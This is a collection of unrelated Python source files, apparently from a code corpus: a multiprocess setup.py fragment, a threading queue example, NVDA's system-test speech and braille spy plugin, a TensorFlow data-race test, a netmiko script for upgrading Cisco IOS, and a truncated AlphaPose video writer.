"Building a framework for predictive science", Proceedings of
the 10th Python in Science Conference, 2011;
http://arxiv.org/pdf/1202.1056
Michael McKerns and Michael Aivazis,
"pathos: a framework for heterogeneous computing", 2010- ;
https://uqfoundation.github.io/project/pathos
Please see https://uqfoundation.github.io/project/pathos or
http://arxiv.org/pdf/1202.1056 for further information.
''' % {'relver': stable_version, 'thisver': stable_version}
#long_description = open(os.path.join(HERE, 'README.md')).read()
#long_description += """
#
#===========
#Changes
#===========
#
#"""
#long_description += open(os.path.join(HERE, 'CHANGES.txt')).read()
#if not is_py3k:
# long_description = long_description.encode('ascii', 'replace')
# -*- Installation Requires -*-
#py_version = sys.version_info
#is_jython = sys.platform.startswith('java')
#is_pypy = hasattr(sys, 'pypy_version_info')
#def strip_comments(l):
# return l.split('#', 1)[0].strip()
#
#def reqs(f):
# return list(filter(None, [strip_comments(l) for l in open(
# os.path.join(os.getcwd(), 'requirements', f)).readlines()]))
#
#if py_version[0] == 3:
# tests_require = reqs('test3.txt')
#else:
# tests_require = reqs('test.txt')
def _is_build_command(argv=sys.argv, cmds=('install', 'build', 'bdist')):
for arg in argv:
if arg.startswith(cmds):
return arg
def run_setup(with_extensions=True):
extensions = []
if with_extensions:
extensions = [
Extension(
'_%s' % pkgname,
sources=multiprocessing_srcs,
define_macros=list(macros.items()),
libraries=libraries,
include_dirs=[srcdir],
depends=glob.glob('%s/*.h' % srcdir) + ['setup.py'],
),
]
packages = find_packages(
where=pkgdir,
exclude=['ez_setup', 'examples', 'doc',],
)
config = dict(
name='multiprocess',
version=meta['version'],
description=('better multiprocessing and multithreading in python'),
long_description=long_description,
packages=packages,
ext_modules=extensions,
author='Mike McKerns',
maintainer='Mike McKerns',
url='https://github.com/uqfoundation/multiprocess',
download_url='https://github.com/uqfoundation/multiprocess/releases/download/multiprocess-%s/multiprocess-%s.tar.gz' % (stable_version, stable_version),
zip_safe=False,
license='BSD',
package_dir={'': pkgdir},
# tests_require=tests_require,
# test_suite='nose.collector',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
'Topic :: Scientific/Engineering',
'Topic :: Software Development',
],
**extras
)
setup(**config)
try:
run_setup(not (is_jython or is_pypy) and lt_py33)
except BaseException:
if _is_build_command(sys.argv): #XXX: skip WARNING if is_pypy?
import traceback
msg = BUILD_WARNING % '\n'.join(traceback.format_stack())
if not is_py3k:
exec('print >> sys.stderr, msg')
else:
exec('print(msg, file=sys.stderr)')
run_setup(False)
else:
raise
|
inter_thread_communication_queue.py
|
import sys
import threading
import queue
# A sentinel object is anything that signals the worker to stop processing tasks.
# You could use None as the sentinel; in fact, that is what is used most of the time.
import time
sentinel = object()
def order_work(q):
for i in range(0, 10):
q.put(i)
time.sleep(1)
q.put(sentinel)
def do_work(q):
while True:
value = q.get()
if value is sentinel:
sys.stdout.write("\nexiting\n")
return
sys.stdout.write(str(value))
q = queue.Queue()
t1 = threading.Thread(target=do_work, args=(q,))
t2 = threading.Thread(target=order_work, args=(q,))
t1.start()
t2.start()
|
speechSpyGlobalPlugin.py
|
# A part of NonVisual Desktop Access (NVDA)
# Copyright (C) 2018 NV Access Limited
# This file may be used under the terms of the GNU General Public License, version 2 or later.
# For more details see: https://www.gnu.org/licenses/gpl-2.0.html
"""This module provides an NVDA global plugin which creates a and robot library remote server.
It allows tests to get information out of NVDA.
It is copied into the (system test specific) NVDA profile directory. It becomes the '__init__.py' file as part
of a package.
"""
import gettext
import typing
from typing import Optional
import extensionPoints
import globalPluginHandler
import threading
from .blockUntilConditionMet import _blockUntilConditionMet
from logHandler import log
from time import perf_counter as _timer
from keyboardHandler import KeyboardInputGesture
import inputCore
import queueHandler
import watchdog
import ctypes
import sys
import os
def _importRobotRemoteServer() -> typing.Type:
log.debug(f"before path mod: {sys.path}")
# Get the path to the top of the package
TOP_DIR = os.path.abspath(os.path.dirname(__file__))
# imports that require libraries not distributed with an install of NVDA
sys.path.append(os.path.join(TOP_DIR, "libs"))
log.debug(f"after path mod: {sys.path}")
from robotremoteserver import RobotRemoteServer
return RobotRemoteServer
class BrailleViewerSpy:
postBrailleUpdate = extensionPoints.Action()
def __init__(self):
self._last = ""
def updateBrailleDisplayed(
self,
cells, # ignored
rawText,
currentCellCount, # ignored
):
rawText = rawText.strip()
if rawText and rawText != self._last:
self._last = rawText
self.postBrailleUpdate.notify(rawText=rawText)
isDestroyed: bool = False
def saveInfoAndDestroy(self):
if not self.isDestroyed:
self.isDestroyed = True
import brailleViewer
brailleViewer._onGuiDestroyed()
class NVDASpyLib:
""" Robot Framework Library to spy on NVDA during system tests.
Used to determine if NVDA has finished starting, and various ways of getting speech output.
All public methods are part of the Robot Library
"""
SPEECH_HAS_FINISHED_SECONDS: float = 0.5
def __init__(self):
# speech cache is ordered temporally, oldest at low indexes, most recent at highest index.
self._nvdaSpeech_requiresLock = [ # requires thread locking before read/write
[""], # initialise with an empty string, this allows for access via [-1]. This is equiv to no speech.
]
self._lastSpeechTime_requiresLock = _timer()
#: Lock to protect members that are written to in _onNvdaSpeech.
self._speechLock = threading.RLock()
# braille raw text (not dots) cache is ordered temporally,
# oldest at low indexes, most recent at highest index.
self._nvdaBraille_requiresLock = [ # requires thread locking before read/write
"", # initialise with an empty string, this allows for access via [-1]. This is equiv to no braille.
]
#: Lock to protect members that are written to in _onNvdaBraille.
self._brailleLock = threading.RLock()
self._isNvdaStartupComplete = False
self._allSpeechStartIndex = self.get_last_speech_index()
self._allBrailleStartIndex = self.get_last_braille_index()
self._maxKeywordDuration = 30
self._registerWithExtensionPoints()
def _registerWithExtensionPoints(self):
from core import postNvdaStartup
postNvdaStartup.register(self._onNvdaStartupComplete)
# This file (`speechSpyGlobalPlugin.py`) is moved to
# "scratchpad/globalPlugins/speechSpyGlobalPlugin/__init__.py"
# Import path must be valid after `speechSpySynthDriver.py` is moved to "scratchpad/synthDrivers/"
from synthDrivers.speechSpySynthDriver import post_speech
post_speech.register(self._onNvdaSpeech)
self._brailleSpy = BrailleViewerSpy()
self._brailleSpy.postBrailleUpdate.register(self._onNvdaBraille)
def set_configValue(self, keyPath: typing.List[str], val: typing.Union[str, bool, int]):
import config
if not keyPath or len(keyPath) < 1:
raise ValueError("Key path not provided")
penultimateConf = config.conf
for key in keyPath[:-1]:
penultimateConf = penultimateConf[key]
ultimateKey = keyPath[-1]
penultimateConf[ultimateKey] = val
fakeTranslations: typing.Optional[gettext.NullTranslations] = None
def override_translationString(self, invariantString: str, replacementString: str):
import languageHandler
if not self.fakeTranslations:
class Translation_Fake(gettext.NullTranslations):
originalTranslationFunction: Optional
translationResults: typing.Dict[str, str]
def __init__(
self,
originalTranslationFunction: Optional
):
self.originalTranslationFunction = originalTranslationFunction
self.translationResults = {}
super().__init__()
self.install()
def gettext(self, msg: str) -> str:
if msg in self.translationResults:
return self.translationResults[msg]
if self.originalTranslationFunction:
return self.originalTranslationFunction.gettext(msg)
return msg
def restore(self) -> None:
self.translationResults.clear()
if self.originalTranslationFunction:
self.originalTranslationFunction.install()
self.fakeTranslations = Translation_Fake(
languageHandler.installedTranslation() if languageHandler.installedTranslation else None
)
self.fakeTranslations.translationResults[invariantString] = replacementString
def queueNVDAMainThreadCrash(self):
from queueHandler import queueFunction, eventQueue
queueFunction(eventQueue, _crashNVDA)
def queueNVDABrailleThreadCrash(self):
from braille import _BgThread
_BgThread.queueApc(ctypes.windll.Kernel32.DebugBreak)
def queueNVDAUIAHandlerThreadCrash(self):
from UIAHandler import handler
handler.MTAThreadQueue.put(_crashNVDA)
# callbacks for extension points
def _onNvdaStartupComplete(self):
self._isNvdaStartupComplete = True
import brailleViewer
brailleViewer._brailleGui = self._brailleSpy
self.setBrailleCellCount(120)
brailleViewer.postBrailleViewerToolToggledAction.notify(created=True)
def _onNvdaBraille(self, rawText: str):
if not rawText:
return
if not isinstance(rawText, str):
raise TypeError(f"rawText expected as str, got: {type(rawText)}, {rawText!r}")
with self._brailleLock:
self._nvdaBraille_requiresLock.append(rawText)
def _onNvdaSpeech(self, speechSequence=None):
if not speechSequence:
return
with self._speechLock:
self._lastSpeechTime_requiresLock = _timer()
self._nvdaSpeech_requiresLock.append(speechSequence)
@staticmethod
def _getJoinedBaseStringsFromCommands(speechCommandArray) -> str:
baseStrings = [c for c in speechCommandArray if isinstance(c, str)]
return ''.join(baseStrings).strip()
def _getSpeechAtIndex(self, speechIndex):
with self._speechLock:
return self._getJoinedBaseStringsFromCommands(self._nvdaSpeech_requiresLock[speechIndex])
def get_speech_at_index_until_now(self, speechIndex: int) -> str:
""" All speech from (and including) the index until now.
@param speechIndex:
@return: The speech joined together, see L{_getJoinedBaseStringsFromCommands}
"""
with self._speechLock:
speechCommands = [
self._getJoinedBaseStringsFromCommands(x) for x in self._nvdaSpeech_requiresLock[speechIndex:]
]
return "\n".join(x for x in speechCommands if x and not x.isspace())
def get_last_speech_index(self) -> int:
with self._speechLock:
return len(self._nvdaSpeech_requiresLock) - 1
def _getIndexOfSpeech(self, speech, searchAfterIndex: Optional[int] = None):
if searchAfterIndex is None:
firstIndexToCheck = 0
else:
firstIndexToCheck = 1 + searchAfterIndex
with self._speechLock:
for index, commands in enumerate(self._nvdaSpeech_requiresLock[firstIndexToCheck:]):
index = index + firstIndexToCheck
baseStrings = [c.strip() for c in commands if isinstance(c, str)]
if any(speech in x for x in baseStrings):
return index
return -1
def _hasSpeechFinished(self, speechStartedIndex: Optional[int] = None):
with self._speechLock:
started = speechStartedIndex is None or speechStartedIndex < self.get_next_speech_index()
finished = self.SPEECH_HAS_FINISHED_SECONDS < _timer() - self._lastSpeechTime_requiresLock
return started and finished
def setBrailleCellCount(self, brailleCellCount: int):
import brailleViewer
brailleViewer.DEFAULT_NUM_CELLS = brailleCellCount
def _getBrailleAtIndex(self, brailleIndex: int) -> str:
with self._brailleLock:
return self._nvdaBraille_requiresLock[brailleIndex]
def get_braille_at_index_until_now(self, brailleIndex: int) -> str:
""" All raw braille text from (and including) the index until now.
@param brailleIndex:
@return: The raw text, each update on a new line
"""
with self._brailleLock:
rangeOfInterest = self._nvdaBraille_requiresLock[brailleIndex:]
return "\n".join(rangeOfInterest)
def get_last_braille_index(self) -> int:
with self._brailleLock:
return len(self._nvdaBraille_requiresLock) - 1
def _devInfoToLog(self):
import api
obj = api.getNavigatorObject()
if hasattr(obj, "devInfo"):
log.info("Developer info for navigator object:\n%s" % "\n".join(obj.devInfo))
else:
log.info("No developer info for navigator object")
def dump_speech_to_log(self):
log.debug("dump_speech_to_log.")
with self._speechLock:
try:
self._devInfoToLog()
except Exception:
log.error("Unable to log dev info")
try:
log.debug(f"All speech:\n{repr(self._nvdaSpeech_requiresLock)}")
except Exception:
log.error("Unable to log speech")
def dump_braille_to_log(self):
log.debug("dump_braille_to_log.")
with self._brailleLock:
try:
log.debug(f"All braille:\n{repr(self._nvdaBraille_requiresLock)}")
except Exception:
log.error("Unable to log braille")
def _minTimeout(self, timeout: float) -> float:
"""Helper to get the minimum value, the timeout passed in, or self._maxKeywordDuration"""
return min(timeout, self._maxKeywordDuration)
def init_max_keyword_duration(self, maxSeconds: float):
"""This should only be called once, immediately after importing the library.
@param maxSeconds: Should match the 'timeout' value given to the `robot.libraries.Remote` instance. If
this value is greater than the `robot.libraries.Remote` timeout, the remote connection may time out
first, failing the test without ever exiting NVDA and requiring manual intervention.
Should be set to a large value like '30' (seconds).
"""
self._maxKeywordDuration = maxSeconds - 1
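# Illustrative example (hypothetical numbers): if the Robot Framework Remote library was
# created with timeout=30, the matching call is init_max_keyword_duration(maxSeconds=30);
# keywords then give up after at most 29 seconds, one second before the remote connection
# itself would time out.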
def wait_for_NVDA_startup_to_complete(self):
_blockUntilConditionMet(
getValue=lambda: self._isNvdaStartupComplete,
giveUpAfterSeconds=self._minTimeout(10),
errorMessage="Unable to connect to nvdaSpy",
)
self.reset_all_speech_index()
def get_last_speech(self) -> str:
return self._getSpeechAtIndex(-1)
def get_all_speech(self) -> str:
return self.get_speech_at_index_until_now(self._allSpeechStartIndex)
def reset_all_speech_index(self) -> int:
self._allSpeechStartIndex = self.get_last_speech_index()
return self._allSpeechStartIndex
def get_next_speech_index(self) -> int:
""" @return: the next index that will be used.
"""
return self.get_last_speech_index() + 1
def wait_for_specific_speech(
self,
speech: str,
afterIndex: Optional[int] = None,
maxWaitSeconds: int = 5,
) -> int:
"""
@param speech: The speech to expect.
@param afterIndex: The speech should come after this index. The index is exclusive.
@param maxWaitSeconds: The amount of time to wait in seconds.
@return: the index of the speech.
"""
success, speechIndex = _blockUntilConditionMet(
getValue=lambda: self._getIndexOfSpeech(speech, afterIndex),
giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
shouldStopEvaluator=lambda indexFound: indexFound >= (afterIndex if afterIndex else 0),
intervalBetweenSeconds=0.1,
errorMessage=None
)
if not success:
self.dump_speech_to_log()
raise AssertionError(
"Specific speech did not occur before timeout: {}\n"
"See NVDA log for dump of all speech.".format(speech)
)
return speechIndex
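# Usage sketch (the `spy` handle and the spoken text are assumptions, not values from this
# file): capture the next index before triggering output, then wait for the expected phrase:
#   nextIndex = spy.get_next_speech_index()
#   spy.emulateKeyPress("NVDA+t")
#   spy.wait_for_specific_speech("title", afterIndex=nextIndex - 1)
# On timeout an AssertionError is raised and all captured speech is dumped to the NVDA log.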
def wait_for_speech_to_finish(
self,
maxWaitSeconds=5.0,
speechStartedIndex: Optional[int] = None
):
_blockUntilConditionMet(
getValue=lambda: self._hasSpeechFinished(speechStartedIndex=speechStartedIndex),
giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
errorMessage="Speech did not finish before timeout"
)
def wait_for_braille_update(
self,
nextBrailleIndex: int,
maxWaitSeconds=5.0,
):
"""Wait until there is at least a single update.
@note there may be subsequent braille updates. This method does not confirm updates are finished.
"""
_blockUntilConditionMet(
getValue=lambda: self.get_last_braille_index() == nextBrailleIndex,
giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
errorMessage=None
)
def get_last_braille(self) -> str:
return self._getBrailleAtIndex(-1)
def get_next_braille_index(self) -> int:
""" @return: the next index that will be used.
"""
return self.get_last_braille_index() + 1
def emulateKeyPress(self, kbIdentifier: str, blockUntilProcessed=True):
"""
Emulates a key press using NVDA's input gesture framework.
The key press will either result in a script being executed, or the key being sent on to the OS.
By default this method will block until any script resulting from this key has been executed,
and the NVDA core has again gone back to sleep.
@param kbIdentifier: an NVDA keyboard gesture identifier.
0 or more modifier keys followed by a main key, all separated by a plus (+) symbol.
E.g. control+shift+downArrow.
See vkCodes.py in the NVDA source directory for valid key names.
"""
gesture = KeyboardInputGesture.fromName(kbIdentifier)
inputCore.manager.emulateGesture(gesture)
if blockUntilProcessed:
# Emulating may have queued a script or events.
# Insert our own function into the queue after, and wait for that to be also executed.
queueProcessed = False
def _setQueueProcessed():
nonlocal queueProcessed
queueProcessed = True
queueHandler.queueFunction(queueHandler.eventQueue, _setQueueProcessed)
_blockUntilConditionMet(
getValue=lambda: queueProcessed,
giveUpAfterSeconds=self._minTimeout(5),
errorMessage="Timed out waiting for key to be processed",
)
# We know that by now the core will have woken up and processed the scripts, events and our own function.
# Wait for the core to go back to sleep,
# which means there is nothing left for the core to process.
_blockUntilConditionMet(
getValue=lambda: watchdog.isCoreAsleep(),
giveUpAfterSeconds=self._minTimeout(5),
errorMessage="Timed out waiting for core to sleep again",
)
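# Gesture identifier sketch (example values only): modifiers and the main key are joined
# with '+', matching the names in vkCodes.py:
#   spy.emulateKeyPress("downArrow")
#   spy.emulateKeyPress("control+shift+downArrow")
#   spy.emulateKeyPress("NVDA+f7", blockUntilProcessed=False)  # returns without waiting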
class SystemTestSpyServer(globalPluginHandler.GlobalPlugin):
def __init__(self):
super().__init__()
self._server = None
self._start()
def _start(self):
log.debug("SystemTestSpyServer started")
spyLibrary = NVDASpyLib() # spies on NVDA
RobotRemoteServer = _importRobotRemoteServer()
server = self._server = RobotRemoteServer(
spyLibrary, # provides library behaviour
port=8270, # default:8270 is `registered by IANA` for remote server usage. Two ASCII values, RF.
serve=False # we want to start this serving on another thread so as not to block.
)
log.debug("Server address: {}".format(server.server_address))
server_thread = threading.Thread(target=server.serve, name="RF Test Spy Thread")
server_thread.start()
def terminate(self):
log.debug("Terminating the SystemTestSpyServer")
self._server.stop()
def _crashNVDA():
ctypes.windll.Kernel32.DebugBreak()
GlobalPlugin = SystemTestSpyServer
GlobalPlugin.__gestures = {
}
|
dense_update_ops_no_tsan_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for state updating ops that may have benign race conditions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class AssignOpTest(test.TestCase):
# NOTE(mrry): We exclude these tests from the TSAN TAP target, because they
# contain benign and deliberate data races when multiple threads update
# the same parameters without a lock.
def testParallelUpdateWithoutLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(array_ops.zeros([1024, 1024]))
adds = [
state_ops.assign_add(
p, ones_t, use_locking=False) for _ in range(20)
]
self.evaluate(variables.global_variables_initializer())
def run_add(add_op):
self.evaluate(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertTrue((vals >= ones).all())
self.assertTrue((vals <= ones * 20).all())
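# Because use_locking=False lets the 20 assign_add ops race, increments can be lost; the
# assertions above therefore only bound each element between 1 and 20 rather than
# requiring the exact sum of 20.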
def testParallelAssignWithoutLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], float(1))
p = variables.Variable(array_ops.zeros([1024, 1024]))
assigns = [
state_ops.assign(p, math_ops.multiply(ones_t, float(i)), False)
for i in range(1, 21)
]
self.evaluate(variables.global_variables_initializer())
def run_assign(assign_op):
self.evaluate(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is taken from one of the assignments.
self.assertTrue((vals > 0).all())
self.assertTrue((vals <= 20).all())
# NOTE(skyewm): We exclude these tests from the TSAN TAP target, because they
# contain non-benign but known data races between the variable assignment and
# returning the output tensors. This issue will be resolved with the new
# resource variables.
def testParallelUpdateWithLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
adds = [
state_ops.assign_add(
p, ones_t, use_locking=True) for _ in range(20)
]
self.evaluate(p.initializer)
def run_add(add_op):
self.evaluate(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertAllEqual(vals, ones * 20)
def testParallelAssignWithLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
assigns = [
state_ops.assign(
p, math_ops.multiply(ones_t, float(i)), use_locking=True)
for i in range(1, 21)
]
self.evaluate(p.initializer)
def run_assign(assign_op):
self.evaluate(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is the same, and taken from one of the assignments.
self.assertTrue(vals[0, 0] > 0)
self.assertTrue(vals[0, 0] <= 20)
self.assertAllEqual(vals, np.ones([1024, 1024]) * vals[0, 0])
if __name__ == "__main__":
test.main()
|
upgrade IOS v2.py
|
from tkinter import *
from tkinter import ttk
import random
import os
import re
import socket
import sys
import netmiko
import time
import multiprocessing
from getpass import getpass
from netmiko import ConnectHandler, SCPConn
#Debug
import logging
logging.basicConfig(filename='test.log', level=logging.DEBUG)
logger = logging.getLogger("netmiko")
#Debug
def ssh_command(ip,username,password):
try:
net_connect = netmiko.ConnectHandler(device_type='cisco_ios', ip=ip, username=username, password=password)
return net_connect.send_command_expect('show ver')
except:
failtext = ip + " couldn't be SSHed to"
to_doc("fails.csv", failtext)
def read_in_info(file_name):
print (file_name)
tmp = []
for line in open(file_name, 'r').readlines():
line = remove_return(line)
line = line.split(',')
tmp.append(line)
return tmp
def remove_return(entry):
tmp = entry.rstrip('\n')
return tmp
def get_ip (input):
return(re.findall(r'(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)', input))
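# Example (illustrative input): get_ip("switch01 10.1.2.3 up 192.168.0.5") returns
# ['10.1.2.3', '192.168.0.5']; read_devices below relies on this to collect every address
# found on each line of IPs.txt.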
def read_devices (file_name):
for line in open(file_name, 'r').readlines():
if get_ip(line):
for each in get_ip(line):
my_devices.append(each)
def to_doc(file_name, variable):
f=open(file_name, 'a')
f.write(variable)
f.write('\n')
f.close()
def find_ver(sh_ver,upgrade_info):
for each in upgrade_info:
if each[1] in sh_ver:
return each
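# Assumed layout of a row in 'upgrade info.csv', inferred from the indexing used below
# (the values are hypothetical):
#   model,current-version-string,flash:/,new-image.bin,verify-ok-string,scp-server-ip
# each[1] is matched against 'show ver', each[2]+each[3] build the image path and boot
# statement, each[4] is looked for in the verify output, and each[5] is the optional
# remote SCP server used by the commented-out copy commands.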
def transfer_file(net_connect,file):
net_connect.config_mode()
net_connect.send_command('ip scp server enable')
scp_conn = SCPConn(net_connect)
s_file = file
d_file = file
scp_conn.scp_transfer_file(s_file, d_file)
try:
net_connect.send_command('no ip scp server enable')
net_connect.exit_config_mode()
except:
pass
def verify(device_type,command):
net_connect = netmiko.ConnectHandler(device_type='cisco_ios', ip=ip, username=username, password=password)
net_connect.config_mode()
net_connect.send_command('no ip scp server enable')
net_connect.exit_config_mode()
verify = net_connect.send_command_expect (command,delay_factor=30)
if device_type[4] in verify:
print (ip+" "+'Successfully copied and verified')
try:
net_connect.config_mode()
except:
error = ip+" "+"didn't go into config mode"
to_doc("fails.csv", error)
pass
try:
net_connect.send_command('no boot system',delay_factor=.3)
except:
error = ip + " didn't take no boot system command"
to_doc("fails.csv", error)
pass
try:
command = "boot system "+device_type[2]+device_type[3]
net_connect.send_command(command,delay_factor=.5)
except:
error = ip + " didn't take boot system command"
to_doc("fails.csv", error)
pass
try:
net_connect.exit_config_mode()
except:
error = ip + " config mode didn't exit"
to_doc("fails.csv", error)
try:
net_connect.send_command ('write memory')
start_config = net_connect.send_command ('show run | i boot')
except:
error = "'write mem' or 'show run | i boot' didn't work on "+ ip
to_doc("fails.csv", error)
pass
print (command)
#print (start_config)
if command in start_config:
print (ip +" boot statment is now correct and config is saved")
done = ip + ", boot statment is now correct and config is saved"
to_doc("success.csv",done)
elif command not in start_config:
print (4)
bootstatment = net_connect.send_command ('show boot')
# print (bootstatment)
# print (command)
temp_command = device_type[2]+device_type[3]
# print (temp_command)
if temp_command in bootstatment:
print (ip +" boot statment is now correct and config is saved")
done = ip + ", boot statment is now correct and config is saved"
print("done")
to_doc("success.csv",done)
else:
error= "Boot statment not correct on " + ip
to_doc("fails.csv", error)
else:
error= "something went wrong with " + ip
to_doc("fails.csv", error)
else:
return(verify)
def update_ios(ip,username,password,device_type):
#This part uploads the code from the device the program runs on
net_connect = netmiko.ConnectHandler(device_type='cisco_ios', ip=ip, username=username, password=password)
transfer_file(net_connect,device_type[3])
#This part uploads the code from the specified server
#command = 'cd '+device_type[2]
#net_connect.send_command_expect(command)
#command = 'copy scp://'+username+"@"+device_type[5]+'/'+device_type[3]+" "+device_type[2]+'/'+device_type[3]
#net_connect.send_command_timing(command)
#print (device_type[3])
#net_connect.send_command_timing(remove_return(device_type[3]))
#
#net_connect.send_command_timing(password, delay_factor=30)
##time.sleep(200)
# #print (1)
#Uncomment these lines for a slow link where the OS isn't getting copied correctly
#sleep_time = 600
#time.sleep(sleep_time)
#print (str(sleep_time/60)+' min is up, off to verify')
command = "verify "+ device_type[2]+device_type[3]
output = verify(device_type,command)
if output:
print (output)
if "No such file or directory" in output:
#print (output)
command = "verify /md5 " + device_type[2]+device_type[3]
output = verify(device_type,command)
else:
error= "something went wrong with " + ip
to_doc("fails.csv", error)
def upgradeios(ip,username,password):
upgrade_info = read_in_info('upgrade info.csv')
print (ip)
sh_ver = ssh_command(ip,username,password)
ip = remove_return(ip)
print (ip)
device_type = find_ver(sh_ver,upgrade_info)
print (device_type)
update_ios(ip,username,password,device_type)
def start_this_stuff(ip):
p1 = multiprocessing.Process(target = upgradeios, args = (ip,username,password))
p1.start()
username = input("Username: ")
password = getpass()
my_devices = []
read_devices('IPs.txt')
print (my_devices)
for ip in my_devices:
upgradeios(ip,username,password)
#print (ip)
|
writer.py
|
import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.final_result = []
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
self.final_result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
self.final_result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_track:
from PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
if self.save_video:
# initialize the file video stream, adapt output video resolution to original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
# keep looping infinitely
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
self.wait_and_put(self.final_result_queue, None)
if self.save_video:
stream.release()
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
pred = hm_data.cpu().data.numpy()
assert pred.ndim == 4
if hm_data.size()[1] == 49:
self.eval_joints = [*range(0,49)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(pred[i][self.eval_joints], bbox)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
result = pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
result = {
'imgname': im_name,
'result': result
}
if self.opt.pose_track:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
